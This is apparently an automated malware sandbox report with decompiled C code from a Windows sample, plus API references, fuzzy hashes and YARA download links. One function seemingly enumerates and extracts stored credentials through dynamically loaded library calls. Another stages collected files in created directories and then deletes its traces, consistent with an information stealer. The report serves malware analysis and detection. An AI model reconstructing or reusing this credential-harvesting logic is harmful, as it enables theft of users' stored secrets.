                                                                                                                              • API String ID: 3890957890-0
                                                                                                                              • Opcode ID: 1f2ccc3f07caff849bd25012e1026c9cf6fe3874ff363e293360ae0c0acfb85e
                                                                                                                              • Instruction ID: 9cc9c928b3973a5d02f723f5dd61f81d53029beb8fdb6c463f12c4216c2d1ea9
                                                                                                                              • Opcode Fuzzy Hash: 1f2ccc3f07caff849bd25012e1026c9cf6fe3874ff363e293360ae0c0acfb85e
                                                                                                                              • Instruction Fuzzy Hash: 11B162BAF20604BBC604FBE5ED42D4F77B99F68304F104469B509B3285E53DEB109BA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041BEE0, Relevance: 66.5, APIs: 44, Instructions: 492libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 47%
                                                                                                                              			E0041BEE0(void* __ebx) {
				int _v8;
				int _v12;
				int _v16;
				short* _v20;
				signed char _v21;
				signed int _v28;
				char _v284;
				char _v540;
				char _v796;
				int _v800;
				struct _OSVERSIONINFOA _v956;
				struct HINSTANCE__* _v960;
				char _v1220;
				intOrPtr _v1224;
				signed int _v1228;
				int _v1232;
				int _v1236;
				int _v1240;
				intOrPtr* _v1244;
				short* _v1248;
				char _v1249;
				intOrPtr _v1256;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t155;
				struct HINSTANCE__* _t162;
				int _t166;
				CHAR* _t171;
				CHAR* _t176;
				short* _t178;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				intOrPtr _t208;
				intOrPtr _t217;
				intOrPtr _t234;
				void* _t256;
				CHAR* _t258;
				CHAR* _t262;
				CHAR* _t264;
				intOrPtr _t267;
				intOrPtr _t276;
				short* _t287;
				intOrPtr _t289;
				intOrPtr _t292;
				intOrPtr _t299;
				intOrPtr _t304;
				CHAR* _t309;
				CHAR* _t311;
				intOrPtr _t324;
				short* _t335;
				intOrPtr _t337;
				short* _t340;
				intOrPtr _t347;
				intOrPtr _t358;
				signed int _t359;
				void* _t360;
				void* _t362;
				void* _t363;
				void* _t372;
				void* _t381;

				_t256 = __ebx;
				_t155 =  *0x4301f4; // 0xe687535
				_v28 = _t155 ^ _t359;
				_v956.dwOSVersionInfoSize = 0;
				E004091C0( &(_v956.dwMajorVersion), 0, 0x90);
				E004091C0( &_v956, 0, 0x94);
				_t362 = _t360 + 0x18;
				_v956.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v956);
				if(_v956.dwMajorVersion != 6 || _v956.dwMinorVersion < 2) {
					_v1240 = 0;
				} else {
					_v1240 = 1;
				}
				_v21 = _v1240;
				_v20 = 0;
				_v960 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v800 = 0;
				_t258 =  *0x432504; // 0x2335a08
				_t162 = LoadLibraryA(_t258); // executed
				_v960 = _t162;
				if(_v960 == 0) {
					L29:
					 *0x432760(_v8);
					 *0x432740();
					_t166 = FreeLibrary(_v960); // executed
					__eflags = _v28 ^ _t359;
					return E00404354(_t166, _t256, _v28 ^ _t359, _v8, _t357, _t358,  &_v16);
				} else {
					_t309 =  *0x4322ec; // 0x2336a58
					 *0x432704 = GetProcAddress(_v960, _t309);
					_t262 =  *0x4324a0; // 0x2336b30
					 *0x432740 = GetProcAddress(_v960, _t262);
					_t171 =  *0x4324d4; // 0x2335eb0
					 *0x432758 = GetProcAddress(_v960, _t171);
					_t311 =  *0x4323a8; // 0x2336b18
					 *0x4326fc = GetProcAddress(_v960, _t311);
					_t264 =  *0x4323a8; // 0x2336b18
					 *0x43275c = GetProcAddress(_v960, _t264);
					_t176 =  *0x4326ec; // 0x2336a70
					 *0x432760 = GetProcAddress(_v960, _t176);
					_t178 =  *0x432704(0x43108c, 0,  &_v16); // executed
					_v20 = _t178;
					if(_v20 != 0) {
						goto L29;
					}
					_t314 = _v16;
					_v20 =  *0x432758(_v16, 0x200,  &_v12,  &_v8);
					if(_v20 == 0 && _v12 != 0) {
						_t181 =  *0x432188; // 0x23366d0
						_t267 =  *0x4325d0; // 0x23369c8
						_t182 = E004055AB(_t267, _t181);
						_t363 = _t362 + 8;
						_v1224 = _t182;
						_v1228 = 0;
						while(_v1228 < _v12) {
							if((_v21 & 0x000000ff) == 0) {
								_v1236 = _v1228 * 0x34 + _v8;
								_t357 = 0x43109c;
								_t358 = _v1236;
								__eflags = 0;
								asm("repe cmpsd");
								if(0 != 0) {
									L27:
									_t314 = _v1228 + 1;
									_v1228 = _v1228 + 1;
									continue;
								}
								WideCharToMultiByte(0, 0,  *(_v1236 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
								_v1244 =  &_v284;
								_t340 = _v1244 + 1;
								__eflags = _t340;
								_v1248 = _t340;
								do {
									_v1249 =  *_v1244;
									_v1244 = _v1244 + 1;
									__eflags = _v1249;
								} while (_v1249 != 0);
								_v1256 = _v1244 - _v1248;
								__eflags = _v1256 - 2;
								if(__eflags > 0) {
									WideCharToMultiByte(0, 0,  *(_v1236 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
									_t193 =  *0x4323c8; // 0x2336908
									E004055C2(_t256, 0x43109c, _t358, __eflags);
									E004055C2(_t256, 0x43109c, _t358, __eflags);
									_t276 =  *0x4323b8; // 0x2336b48
									E004055C2(_t256, 0x43109c, _t358, __eflags);
									E004055C2(_t256, _t357, _t358, __eflags);
									WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1236 + 0x14)) + 0x20, 0xffffffff,  &_v1220, 0x100, 0, 0);
									_t347 =  *0x432258; // 0x2336a10
									E004055C2(_t256, _t357, _t358, __eflags);
									E004055C2(_t256, _t357, _t358, __eflags);
									WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1236 + 0x18)) + 0x20, 0xffffffff,  &_v796, 0x100, 0, 0);
									_t208 =  *0x4322b4; // 0x2336938
									E004055C2(_t256, _t357, _t358, __eflags);
									E004055C2(_t256, _t357, _t358, __eflags);
									_t381 = _t363 + 0x4c;
									_v800 = 0;
									_v20 =  *0x4326fc(_v16, _v1236,  *((intOrPtr*)(_v1236 + 0x14)),  *((intOrPtr*)(_v1236 + 0x18)), 0, 0,  &_v800, _v1224, "\n", _v1224, _t208,  &_v796, _v1224, "\n", _v1224, _t347,  &_v1220, _v1224, "\n", _v1224, _t276,  &_v284, _v1224, "\n", _v1224, _t193);
									__eflags = _v20;
									if(__eflags == 0) {
										_v1236 = _v800;
										_t287 =  *((intOrPtr*)(_v1236 + 0x1c)) + 0x20;
										__eflags = _t287;
										WideCharToMultiByte(0, 0, _t287, 0xffffffff,  &_v540, 0x100, 0, 0);
										_push( &_v540);
										_t217 =  *0x4326c4; // 0x2336a28
										_push(_t217);
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_push("\n\n");
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_t363 = _t381 + 0x14;
									} else {
										_t289 =  *0x4321a4; // 0x23367a0
										_push(_t289);
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_push("\n\n");
										_push(_v1224);
										E004055C2(_t256, _t357, _t358, __eflags);
										_t363 = _t381 + 0x10;
									}
								}
								__eflags = _v800;
								if(__eflags != 0) {
									 *0x432760(_v800);
								}
								goto L27;
							}
							_v1232 = _v1228 * 0x38 + _v8;
							_t357 = 0x43109c;
							_t358 = _v1232;
							asm("repe cmpsd");
							if(0 == 0) {
								WideCharToMultiByte(0, 0,  *(_v1232 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
								_t292 =  *0x4323c8; // 0x2336908
								E004055C2(_t256, 0x43109c, _t358, 0);
								E004055C2(_t256, 0x43109c, _t358, 0);
								_t324 =  *0x4323b8; // 0x2336b48
								E004055C2(_t256, 0x43109c, _t358, 0);
								E004055C2(_t256, _t357, _t358, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1232 + 0x14)) + 0x20, 0xffffffff,  &_v1220, 0x100, 0, 0);
								_t234 =  *0x432258; // 0x2336a10
								E004055C2(_t256, _t357, _t358, 0);
								E004055C2(_t256, _t357, _t358, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1232 + 0x18)) + 0x20, 0xffffffff,  &_v796, 0x100, 0, 0);
								_t299 =  *0x4322b4; // 0x2336938
								E004055C2(_t256, _t357, _t358, 0);
								E004055C2(_t256, _t357, _t358, 0);
								_t372 = _t363 + 0x4c;
								_v800 = 0;
								_v20 =  *0x43275c(_v16, _v1232,  *((intOrPtr*)(_v1232 + 0x14)),  *((intOrPtr*)(_v1232 + 0x18)), 0, 0, 0,  &_v800, _v1224, "\n", _v1224, _t299,  &_v796, _v1224, "\n", _v1224, _t234,  &_v1220, _v1224, "\n", _v1224, _t324,  &_v284, _v1224, "\n", _v1224, _t292);
								_t395 = _v20;
								if(_v20 == 0) {
									_v1232 = _v800;
									_t335 =  *((intOrPtr*)(_v1232 + 0x1c)) + 0x20;
									__eflags = _t335;
									WideCharToMultiByte(0, 0, _t335, 0xffffffff,  &_v540, 0x100, 0, 0);
									_push( &_v540);
									_t304 =  *0x4326c4; // 0x2336a28
									_push(_t304);
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, __eflags);
									_push("\n\n");
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, __eflags);
									_t363 = _t372 + 0x14;
								} else {
									_t337 =  *0x4321a4; // 0x23367a0
									_push(_t337);
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, _t395);
									_push("\n\n");
									_push(_v1224);
									E004055C2(_t256, _t357, _t358, _t395);
									_t363 = _t372 + 0x10;
								}
								 *0x432760(_v800);
							}
							goto L27;
						}
						_push(_v1224);
						E00405EA3(_t256, _t314, _t357, _t358, __eflags);
					}
					goto L29;
				}
			}

































































                                                                                                                              0x0041bee0
                                                                                                                              0x0041bee9
                                                                                                                              0x0041bef0
                                                                                                                              0x0041bef5
                                                                                                                              0x0041bf0d
                                                                                                                              0x0041bf23
                                                                                                                              0x0041bf28
                                                                                                                              0x0041bf2b
                                                                                                                              0x0041bf3c
                                                                                                                              0x0041bf49
                                                                                                                              0x0041bf60
                                                                                                                              0x0041bf54
                                                                                                                              0x0041bf54
                                                                                                                              0x0041bf54
                                                                                                                              0x0041bf70
                                                                                                                              0x0041bf73
                                                                                                                              0x0041bf7a
                                                                                                                              0x0041bf84
                                                                                                                              0x0041bf8b
                                                                                                                              0x0041bf92
                                                                                                                              0x0041bf99
                                                                                                                              0x0041bfa3
                                                                                                                              0x0041bfaa
                                                                                                                              0x0041bfb0
                                                                                                                              0x0041bfbd
                                                                                                                              0x0041c618
                                                                                                                              0x0041c61c
                                                                                                                              0x0041c626
                                                                                                                              0x0041c633
                                                                                                                              0x0041c63e
                                                                                                                              0x0041c648
                                                                                                                              0x0041bfc3
                                                                                                                              0x0041bfc3
                                                                                                                              0x0041bfd7
                                                                                                                              0x0041bfdc
                                                                                                                              0x0041bff0
                                                                                                                              0x0041bff5
                                                                                                                              0x0041c008
                                                                                                                              0x0041c00d
                                                                                                                              0x0041c021
                                                                                                                              0x0041c026
                                                                                                                              0x0041c03a
                                                                                                                              0x0041c03f
                                                                                                                              0x0041c052
                                                                                                                              0x0041c062
                                                                                                                              0x0041c068
                                                                                                                              0x0041c06f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041c082
                                                                                                                              0x0041c08c
                                                                                                                              0x0041c093
                                                                                                                              0x0041c0a3
                                                                                                                              0x0041c0a9
                                                                                                                              0x0041c0b0
                                                                                                                              0x0041c0b5
                                                                                                                              0x0041c0b8
                                                                                                                              0x0041c0be
                                                                                                                              0x0041c0d9
                                                                                                                              0x0041c0ee
                                                                                                                              0x0041c349
                                                                                                                              0x0041c354
                                                                                                                              0x0041c359
                                                                                                                              0x0041c35f
                                                                                                                              0x0041c361
                                                                                                                              0x0041c363
                                                                                                                              0x0041c604
                                                                                                                              0x0041c0d0
                                                                                                                              0x0041c0d3
                                                                                                                              0x00000000
                                                                                                                              0x0041c0d3
                                                                                                                              0x0041c389
                                                                                                                              0x0041c395
                                                                                                                              0x0041c3a1
                                                                                                                              0x0041c3a1
                                                                                                                              0x0041c3a4
                                                                                                                              0x0041c3aa
                                                                                                                              0x0041c3b2
                                                                                                                              0x0041c3b8
                                                                                                                              0x0041c3bf
                                                                                                                              0x0041c3bf
                                                                                                                              0x0041c3d4
                                                                                                                              0x0041c3da
                                                                                                                              0x0041c3e1
                                                                                                                              0x0041c407
                                                                                                                              0x0041c40d
                                                                                                                              0x0041c41a
                                                                                                                              0x0041c42e
                                                                                                                              0x0041c43d
                                                                                                                              0x0041c44b
                                                                                                                              0x0041c45f
                                                                                                                              0x0041c48a
                                                                                                                              0x0041c497
                                                                                                                              0x0041c4a5
                                                                                                                              0x0041c4b9
                                                                                                                              0x0041c4e4
                                                                                                                              0x0041c4f1
                                                                                                                              0x0041c4fe
                                                                                                                              0x0041c512
                                                                                                                              0x0041c517
                                                                                                                              0x0041c51a
                                                                                                                              0x0041c554
                                                                                                                              0x0041c557
                                                                                                                              0x0041c55b
                                                                                                                              0x0041c58f
                                                                                                                              0x0041c5b0
                                                                                                                              0x0041c5b0
                                                                                                                              0x0041c5b8
                                                                                                                              0x0041c5c4
                                                                                                                              0x0041c5c5
                                                                                                                              0x0041c5ca
                                                                                                                              0x0041c5d1
                                                                                                                              0x0041c5d2
                                                                                                                              0x0041c5da
                                                                                                                              0x0041c5e5
                                                                                                                              0x0041c5e6
                                                                                                                              0x0041c5eb
                                                                                                                              0x0041c55d
                                                                                                                              0x0041c55d
                                                                                                                              0x0041c563
                                                                                                                              0x0041c56a
                                                                                                                              0x0041c56b
                                                                                                                              0x0041c573
                                                                                                                              0x0041c57e
                                                                                                                              0x0041c57f
                                                                                                                              0x0041c584
                                                                                                                              0x0041c584
                                                                                                                              0x0041c55b
                                                                                                                              0x0041c5ee
                                                                                                                              0x0041c5f5
                                                                                                                              0x0041c5fe
                                                                                                                              0x0041c5fe
                                                                                                                              0x00000000
                                                                                                                              0x0041c5f5
                                                                                                                              0x0041c100
                                                                                                                              0x0041c10b
                                                                                                                              0x0041c110
                                                                                                                              0x0041c118
                                                                                                                              0x0041c11a
                                                                                                                              0x0041c140
                                                                                                                              0x0041c146
                                                                                                                              0x0041c154
                                                                                                                              0x0041c168
                                                                                                                              0x0041c177
                                                                                                                              0x0041c185
                                                                                                                              0x0041c199
                                                                                                                              0x0041c1c4
                                                                                                                              0x0041c1d1
                                                                                                                              0x0041c1de
                                                                                                                              0x0041c1f2
                                                                                                                              0x0041c21d
                                                                                                                              0x0041c22a
                                                                                                                              0x0041c238
                                                                                                                              0x0041c24c
                                                                                                                              0x0041c251
                                                                                                                              0x0041c254
                                                                                                                              0x0041c290
                                                                                                                              0x0041c293
                                                                                                                              0x0041c297
                                                                                                                              0x0041c2cb
                                                                                                                              0x0041c2ec
                                                                                                                              0x0041c2ec
                                                                                                                              0x0041c2f4
                                                                                                                              0x0041c300
                                                                                                                              0x0041c301
                                                                                                                              0x0041c307
                                                                                                                              0x0041c30e
                                                                                                                              0x0041c30f
                                                                                                                              0x0041c317
                                                                                                                              0x0041c322
                                                                                                                              0x0041c323
                                                                                                                              0x0041c328
                                                                                                                              0x0041c299
                                                                                                                              0x0041c299
                                                                                                                              0x0041c29f
                                                                                                                              0x0041c2a6
                                                                                                                              0x0041c2a7
                                                                                                                              0x0041c2af
                                                                                                                              0x0041c2ba
                                                                                                                              0x0041c2bb
                                                                                                                              0x0041c2c0
                                                                                                                              0x0041c2c0
                                                                                                                              0x0041c332
                                                                                                                              0x0041c332
                                                                                                                              0x00000000
                                                                                                                              0x0041c338
                                                                                                                              0x0041c60f
                                                                                                                              0x0041c610
                                                                                                                              0x0041c615
                                                                                                                              0x00000000
                                                                                                                              0x0041c093

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041BF0D
                                                                                                                              • _memset.LIBCMT ref: 0041BF23
                                                                                                                              • GetVersionExA.KERNEL32(00000094), ref: 0041BF3C
                                                                                                                              • LoadLibraryA.KERNEL32(02335A08), ref: 0041BFAA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336A58), ref: 0041BFD1
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336B30), ref: 0041BFEA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02335EB0), ref: 0041C002
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336B18), ref: 0041C01B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336B18), ref: 0041C034
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336A70), ref: 0041C04C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$_memset$LibraryLoadVersion
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 173895360-0
                                                                                                                              • Opcode ID: f59af888b5717aaf9566395d8c9c53b99e9af5a8d934e0a4aaff498b539cd5cb
                                                                                                                              • Instruction ID: 9c1cb109650bf368c340d73eaff42f367f4baa9dcd49982eb3bde8b86a13c175
                                                                                                                              • Opcode Fuzzy Hash: f59af888b5717aaf9566395d8c9c53b99e9af5a8d934e0a4aaff498b539cd5cb
                                                                                                                              • Instruction Fuzzy Hash: D412AFB1A00218AFDB64DF50DD85FDAB7B9EB48704F1042D9F609A72D0D7B4AA84CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420BE0, Relevance: 54.5, APIs: 36, Instructions: 529fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E00420BE0(void* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v1024;
				char _v1352;
				char _v41352;
				char _v42352;
				char _v43352;
				char _v44352;
				char _v45352;
				char _v46352;
				char _v47352;
				char _v48352;
				char _v49352;
				char _v50352;
				char _v51352;
				char _v52352;
				char _v53352;
				char _v54352;
				char _v55352;
				char _v56352;
				void* _v56356;
				void* _v56360;
				char _v56361;
				void* _v56368;
				unsigned int _v56372;
				void* _v56376;
				char _v56377;
				void* _v56384;
				void* _v56388;
				char _v56389;
				void* _v56396;
				signed int _v56400;
				void* _v56404;
				char _v56405;
				intOrPtr* _v56412;
				intOrPtr _v56416;
				char _v56417;
				intOrPtr _v56424;
				void* __edi;
				void* __esi;
				signed int _t155;
				signed int _t156;
				intOrPtr _t253;
				void* _t277;
				signed int _t350;
				int _t353;
				signed int _t361;
				int _t364;
				signed int _t411;
				void* _t415;
				void* _t416;
				void* _t425;
				void* _t426;
				signed int _t427;
				void* _t428;
				void* _t466;
				void* _t470;
				void* _t475;

				_t475 = __eflags;
				_t294 = __ebx;
				E00412A40(0xdc58);
				_t155 =  *0x4301f4; // 0xe687535
				_t156 = _t155 ^ _t427;
				_v24 = _t156;
				 *[fs:0x0] =  &_v16;
				E004091C0( &_v42352, 0, 0x3e8);
				E004091C0( &_v56352, 0, 0x3e8);
				E004091C0( &_v55352, 0, 0x3e8);
				E004091C0( &_v47352, 0, 0x3e8);
				E004091C0( &_v52352, 0, 0x3e8);
				E004091C0( &_v54352, 0, 0x3e8);
				E004091C0( &_v1024, 0, 0x3e8);
				E004091C0( &_v53352, 0, 0x3e8);
				E004091C0( &_v46352, 0, 0x3e8);
				E004091C0( &_v51352, 0, 0x3e8);
				E004091C0( &_v49352, 0, 0x3e8);
				E004091C0( &_v45352, 0, 0x3e8);
				E004091C0( &_v48352, 0, 0x3e8);
				E004091C0( &_v50352, 0, 0x3e8);
				E004091C0( &_v44352, 0, 0x3e8);
				E004091C0( &_v43352, 0, 0x3e8);
				E004091C0( &_v41352, 0, 0x9c40);
				E00421620( &_v1352, _t415, _t425, 0x4294cf, 0xfde9, 0, 0, 0); // executed
				_v8 = 0;
				 *0x432768( &_v46352,  *0x432244,  *0x4326d8, _t156, _t415, _t425,  *[fs:0x0], E0042673D, 0xffffffff);
				 *0x432768( &_v51352,  *0x432520,  *0x4326d8);
				 *0x432768( &_v49352,  *0x43252c,  *0x4326d8);
				 *0x432768( &_v45352,  *0x4326e4,  *0x4326d8);
				 *0x432768( &_v48352,  *0x43259c,  *0x4326d8);
				 *0x432768( &_v50352,  *0x43256c,  *0x4326d8);
				 *0x432768( &_v44352,  *0x432294,  *0x4326d8);
				 *0x432768( &_v43352,  *0x4322e8,  *0x4326d8);
				 *0x4328c4( &_v55352,  *0x432570);
				 *0x4328c4( &_v55352, E0041A580( *0x432570, _t415, _t425, _t475, 0xf));
				 *0x432768( &_v56352,  *0x4326f4, E0041A580( *0x432570, _t415, _t425, _t475, 0xa));
				 *0x432768( &_v42352,  *0x4322bc,  &_v55352,  &_v56352);
				 *0x4328c4( &_v47352,  &_v55352);
				 *0x4328c4( &_v47352,  *0x4322e0);
				 *0x4328c4( &_v52352,  &_v55352);
				 *0x4328c4( &_v52352,  *0x4326a0);
				 *0x4328c4( &_v54352,  &_v55352);
				 *0x4328c4( &_v54352,  *0x4322c4);
				 *0x4328c4( &_v1024,  &_v55352);
				 *0x4328c4( &_v1024,  *0x4320c4);
				E00420080(__ebx, _t415, _t425, _t475,  &_v50352,  *0x432618); // executed
				E00420080(__ebx, _t415, _t425, _t475,  &_v46352,  *0x432568); // executed
				E00420080(__ebx, _t415, _t425, _t475,  &_v51352,  *0x4322f0); // executed
				E00420080(__ebx, _t415, _t425, _t475,  &_v49352,  *0x432398); // executed
				E00420080(_t294, _t415, _t425, _t475,  &_v45352,  *0x432458); // executed
				E00420080(_t294, _t415, _t425, _t475,  &_v48352,  *0x432440); // executed
				E00420080(_t294, _t415, _t425, _t475,  &_v44352,  *0x4320f4); // executed
				CreateDirectoryA( &_v55352, 0); // executed
				CreateDirectoryA( &_v47352, 0); // executed
				CreateDirectoryA( &_v52352, 0); // executed
				CreateDirectoryA( &_v54352, 0); // executed
				CreateDirectoryA( &_v1024, 0); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				_push( &_v55352); // executed
				E0041EBD0(_t294, _t415, _t425); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				E0041F330( &_v55352); // executed
				E00424F00(_t294, _t415, _t425,  &_v55352); // executed
				_t466 = _t428 + 0x190;
				SetCurrentDirectoryA( &_v55352); // executed
				if(E00422460(_t294,  &_v1352, _t415, _t425,  &_v43352) != 0) {
					_v56356 = E004214D0( &_v1352);
					_v56360 = _v56356;
					do {
						_v56361 =  *_v56356;
						_v56356 = _v56356 + 1;
					} while (_v56361 != 0);
					_v56368 = _v56360;
					_v56372 = _v56356 - _v56360;
					_v56376 =  &_v41352 + 0xffffffff;
					do {
						_v56377 =  *((intOrPtr*)(_v56376 + 1));
						_v56376 = _v56376 + 1;
					} while (_v56377 != 0);
					_t425 = _v56368;
					_t361 = _v56372 >> 2;
					_t364 = memcpy(_v56376, _t425, _t361 << 2) & 0x00000003;
					memcpy(_t425 + _t361 + _t361, _t425, _t364);
					_t466 = _t466 + 0x18;
					_t415 = _t425 + _t364 + _t364;
				}
				E00421580( &_v1352);
				E00420A30(_t294, _t415, _t425,  &_v41352,  &_v55352);
				SetCurrentDirectoryA( &_v55352); // executed
				E0041FC30(_t294,  &_v55352, _t415, _t425); // executed
				_t253 = E00416CE0( &_v56352, 0); // executed
				_v20 = _t253;
				E00420540(_t294, _t415, _t425, _v20, 0x4294df,  &_v55352); // executed
				E00417A10(_v20); // executed
				_t470 = _t466 + 0x20;
				E004218C0(_t294,  &_v1352,  &_v56352, _t415, _t425,  *0x4320e8,  &_v56352); // executed
				if(E00422460(_t294,  &_v1352, _t415, _t425,  *0x4326d8) != 0) {
					_v56384 = E004214D0( &_v1352);
					_v56388 = _v56384;
					do {
						_v56389 =  *_v56384;
						_v56384 = _v56384 + 1;
					} while (_v56389 != 0);
					_v56396 = _v56388;
					_v56400 = _v56384 - _v56388;
					_v56404 =  &_v53352 + 0xffffffff;
					do {
						_v56405 =  *((intOrPtr*)(_v56404 + 1));
						_v56404 = _v56404 + 1;
					} while (_v56405 != 0);
					_t425 = _v56396;
					_t411 = _v56400;
					_t350 = _t411 >> 2;
					memcpy(_v56404, _t425, _t350 << 2);
					_t353 = _t411 & 0x00000003;
					memcpy(_t425 + _t350 + _t350, _t425, _t353);
					_t470 = _t470 + 0x18;
					_t415 = _t425 + _t353 + _t353;
				}
				SetCurrentDirectoryA( *0x432570); // executed
				_v56412 =  &_v53352;
				_v56416 = _v56412 + 1;
				do {
					_v56417 =  *_v56412;
					_v56412 = _v56412 + 1;
				} while (_v56417 != 0);
				_v56424 = _v56412 - _v56416;
				_t488 = _v56424 - 4;
				if(_v56424 > 4) {
					E00420130(_t294, _t415, _t425, _t488,  &_v53352);
					_t470 = _t470 + 4;
				}
				E0041F540( &_v55352); // executed
				SetCurrentDirectoryA( *0x432570); // executed
				RemoveDirectoryA( &_v55352); // executed
				DeleteFileA( *0x432568); // executed
				DeleteFileA( *0x4322f0); // executed
				DeleteFileA( *0x432398); // executed
				DeleteFileA( *0x432458); // executed
				DeleteFileA( *0x432440); // executed
				DeleteFileA( *0x432618); // executed
				DeleteFileA( *0x4320f4); // executed
				E0041A720(_t294, _t415, _t425, _t488,  &_v55352); // executed
				_v8 = 0xffffffff;
				_t277 = E004215C0( &_v1352); // executed
				 *[fs:0x0] = _v16;
				_pop(_t416);
				_pop(_t426);
				return E00404354(_t277, _t294, _v24 ^ _t427,  &_v55352, _t416, _t426);
			}































































                                                                                                                              0x00420be0
                                                                                                                              0x00420be0
                                                                                                                              0x00420bf6
                                                                                                                              0x00420bfb
                                                                                                                              0x00420c00
                                                                                                                              0x00420c02
                                                                                                                              0x00420c0b
                                                                                                                              0x00420c1f
                                                                                                                              0x00420c35
                                                                                                                              0x00420c4b
                                                                                                                              0x00420c61
                                                                                                                              0x00420c77
                                                                                                                              0x00420c8d
                                                                                                                              0x00420ca3
                                                                                                                              0x00420cb9
                                                                                                                              0x00420ccf
                                                                                                                              0x00420ce5
                                                                                                                              0x00420cfb
                                                                                                                              0x00420d11
                                                                                                                              0x00420d27
                                                                                                                              0x00420d3d
                                                                                                                              0x00420d53
                                                                                                                              0x00420d69
                                                                                                                              0x00420d7f
                                                                                                                              0x00420d9d
                                                                                                                              0x00420da2
                                                                                                                              0x00420dbd
                                                                                                                              0x00420dda
                                                                                                                              0x00420df7
                                                                                                                              0x00420e14
                                                                                                                              0x00420e31
                                                                                                                              0x00420e4e
                                                                                                                              0x00420e6b
                                                                                                                              0x00420e88
                                                                                                                              0x00420e9f
                                                                                                                              0x00420eb7
                                                                                                                              0x00420ed6
                                                                                                                              0x00420efa
                                                                                                                              0x00420f11
                                                                                                                              0x00420f25
                                                                                                                              0x00420f39
                                                                                                                              0x00420f4d
                                                                                                                              0x00420f61
                                                                                                                              0x00420f74
                                                                                                                              0x00420f88
                                                                                                                              0x00420f9c
                                                                                                                              0x00420faf
                                                                                                                              0x00420fc5
                                                                                                                              0x00420fdb
                                                                                                                              0x00420ff0
                                                                                                                              0x00421006
                                                                                                                              0x0042101c
                                                                                                                              0x00421031
                                                                                                                              0x00421042
                                                                                                                              0x00421051
                                                                                                                              0x00421060
                                                                                                                              0x0042106f
                                                                                                                              0x0042107e
                                                                                                                              0x0042108b
                                                                                                                              0x00421097
                                                                                                                              0x00421098
                                                                                                                              0x004210a7
                                                                                                                              0x004210ad
                                                                                                                              0x004210b9
                                                                                                                              0x004210be
                                                                                                                              0x004210c8
                                                                                                                              0x004210e2
                                                                                                                              0x004210f3
                                                                                                                              0x004210ff
                                                                                                                              0x00421105
                                                                                                                              0x0042110d
                                                                                                                              0x00421113
                                                                                                                              0x0042111a
                                                                                                                              0x00421135
                                                                                                                              0x0042113b
                                                                                                                              0x0042114a
                                                                                                                              0x00421150
                                                                                                                              0x00421159
                                                                                                                              0x0042115f
                                                                                                                              0x00421166
                                                                                                                              0x00421175
                                                                                                                              0x00421183
                                                                                                                              0x0042118a
                                                                                                                              0x0042118d
                                                                                                                              0x0042118d
                                                                                                                              0x0042118d
                                                                                                                              0x0042118d
                                                                                                                              0x00421195
                                                                                                                              0x004211a8
                                                                                                                              0x004211b7
                                                                                                                              0x004211bd
                                                                                                                              0x004211cb
                                                                                                                              0x004211d3
                                                                                                                              0x004211e6
                                                                                                                              0x004211f2
                                                                                                                              0x004211f7
                                                                                                                              0x0042120d
                                                                                                                              0x00421226
                                                                                                                              0x00421237
                                                                                                                              0x00421243
                                                                                                                              0x00421249
                                                                                                                              0x00421251
                                                                                                                              0x00421257
                                                                                                                              0x0042125e
                                                                                                                              0x00421279
                                                                                                                              0x0042127f
                                                                                                                              0x0042128e
                                                                                                                              0x00421294
                                                                                                                              0x0042129d
                                                                                                                              0x004212a3
                                                                                                                              0x004212aa
                                                                                                                              0x004212b9
                                                                                                                              0x004212bf
                                                                                                                              0x004212c7
                                                                                                                              0x004212ca
                                                                                                                              0x004212ce
                                                                                                                              0x004212d1
                                                                                                                              0x004212d1
                                                                                                                              0x004212d1
                                                                                                                              0x004212d1
                                                                                                                              0x004212d9
                                                                                                                              0x004212e5
                                                                                                                              0x004212f4
                                                                                                                              0x004212fa
                                                                                                                              0x00421302
                                                                                                                              0x00421308
                                                                                                                              0x0042130f
                                                                                                                              0x00421324
                                                                                                                              0x0042132a
                                                                                                                              0x00421331
                                                                                                                              0x0042133a
                                                                                                                              0x0042133f
                                                                                                                              0x0042133f
                                                                                                                              0x00421349
